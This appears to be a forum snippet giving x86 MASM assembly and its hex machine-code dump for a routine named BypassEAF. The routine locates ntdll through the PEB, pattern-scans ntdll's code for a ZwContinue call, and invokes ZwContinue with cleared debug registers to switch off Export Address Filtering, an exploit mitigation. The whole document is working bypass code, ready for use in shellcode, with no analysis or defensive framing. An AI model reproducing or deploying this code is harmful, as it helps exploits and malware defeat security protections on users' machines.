Код:
assume fs:nothing
%GET_NT_BASE macro Reg32
mov Reg32,fs:[TEB.Peb]
mov Reg32,PEB.Ldr[Reg32]
mov Reg32,PEB_LDR_DATA.InLoadOrderModuleList.Flink[Reg32]
mov Reg32,LDR_DATA_TABLE_ENTRY.InLoadOrderModuleList.Flink[Reg32]
mov Reg32,LDR_DATA_TABLE_ENTRY.DllBase[Reg32]; ntdll.dll
endm
BypassEAF proc uses esi edi
Local Context[300H]:BYTE
%GET_NT_BASE Eax
mov edi,eax
mov esi,eax
add eax,IMAGE_DOS_HEADER.e_lfanew[eax]
add edi,IMAGE_NT_HEADERS.OptionalHeader.BaseOfCode[eax]
mov ecx,IMAGE_NT_HEADERS.OptionalHeader.SizeOfCode[eax]
mov ax,51H; push ecx
sub ecx,20H
@@:
; 51 53 xx xx xx xx xx 0A C0 74 xx 5B 59 6A 00 51 E8 xx xx xx xx
repne scasb
jne Error
cmp byte ptr [edi],53H; push ebx
jne @b
cmp word ptr [edi + 6],0C00AH; or al,al
jne @b
cmp byte ptr [edi + 8],74H; je
jne @b
cmp dword ptr [edi + 10],006A595BH; pop ebx/pop ecx/push 0
jne @b
cmp word ptr [edi + 14],0E851H; push ecx/call ZwContinue
jne @b
mov edx,dword ptr [edi + 16]
xor eax,eax
lea edx,[edx + edi + 20]
push eax
lea edi,Context
mov ecx,8
push edi
rep stosd
mov dword ptr [Context],CONTEXT_DEBUG_REGISTERS; ContextFlags
Call Edx; ZwContinue()
mov eax,esi
Exit:
ret
Error:
xor eax,eax
jmp Exit
BypassEAF endpДамп:
Код:
55 8B EC 81 C4 00 FD FF FF 56 57 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 40 18 8B F8 8B F0
03 40 3C 03 78 2C 8B 48 1C 66 B8 51 00 83 E9 20 F2 AE 75 4E 80 3F 53 75 F7 66 81 7F 06 0A C0 75
EF 80 7F 08 74 75 E9 81 7F 0A 5B 59 6A 00 75 E0 66 81 7F 0E 51 E8 75 D8 8B 57 10 33 C0 8D 54 17
14 50 8D BD 00 FD FF FF B9 08 00 00 00 57 F3 AB C7 85 00 FD FF FF 10 00 01 00 FF D2 8B C6 5F 5E
C9 C3 33 C0 EB F8